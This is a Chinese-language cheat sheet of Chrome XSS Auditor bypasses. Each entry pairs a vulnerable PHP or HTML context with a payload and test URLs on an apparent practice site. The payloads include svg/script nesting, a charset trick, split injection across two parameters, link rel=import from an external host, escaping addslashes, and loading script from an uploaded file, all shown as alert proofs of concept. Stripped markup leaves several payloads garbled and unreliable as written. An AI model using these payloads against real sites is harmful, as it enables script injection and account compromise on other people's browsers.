$html = %3c%3c%3cstr 浏览器安全 / Chrome XSS Auditor bypass

test:

http://mhz.pw/game/xss/charset.php?xss=%3Cmeta%20charset=ISO--JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E

输出在属性中，并且后面还有的情况

context:

img alt="">

script> y = "abc"; script>

payload

{gfm-js-extract-pre-1}

test

http://mhz.pw/game/xss/beforescript.php?xss=%22%3E%3Cscript%2Fsrc%3Ddata%3A%2Calert(document.domain)%2B%22

双输出点的情况

context:

// Echo the value of parameter one

echo "This is text1:".$_GET['text1']."

";

// Echo the value of parameter two

echo "This is text2:".$_GET['text2']."

";

?>

payload:

http://xxx/chrome.php?text1=script>alert(/XSS/);void('&text2=')script>

http://xxx/chrome.php?text1=script>alert(/XSS/);document.write('&text2=')script>

test

http://mhz.pw/game/xss/doubleout.php?text1=%3Cscript%3Ealert(/XSS/);void(%27&text2=%27)%3C/script%3E

Chrome 43 XSSAuditor bypass

大概-06-23以前的版本均可。

context = 全部情况

payload:

xss=svg>script>/1/>alert(document.domain)script>svg>

test

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cscript%3E/%3C1/%3Ealert(document.domain)%3C/script%3E%3C/svg%3E

Chrome 36~40 link 导入html导致bypass

Fixed on Oct 10, .(实际上初还存在)

/p/chromium/issues/detail?id=421166

/bugs/wooyun--090304

由于link导入外部html导致XSSAuditor绕过。

context = 全部情况

payload

xss=link rel=import href=https://auth.mhz.pw/game/xss/link.php>

test

http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3Dimport%20href%3Dhttps%3A%2F%2Fauth.mhz.pw%2Fgame%2Fxss%2Flink.php%3E

输出在script内字符串位置的情况

如果允许闭合字符串，直接闭合并写入javascript即可，如:

http://mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27

但如果不能闭合单引号呢？如这个context

html>

head>

meta charset="utf-8">

title>alltitle>

script type="text/javascript">

var a = 'php echo addslashes($_GET["xss"]); ?>';

script>

head>

body>

123

body>

html>

payload

script>

x = "script>svg>script>alert(1)+"";

script>

x = "script>svg>script>alert(1)+'";

test

http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)%2b%26apos%3B

http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)//

有可控上传点的通用Bypass

context：

网站域名下有可控的上传点，我可以上传一个.txt或.js等文件(只要不是媒体文件，其他文件均可，比如上传是黑名单验证的，可以随便写个后缀)。再引入script标签的src属性即可。

payload

xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E

test

http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E

http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.ayu%3E%3C/script%3E

JSON Encode

context

$_GET['x'])?>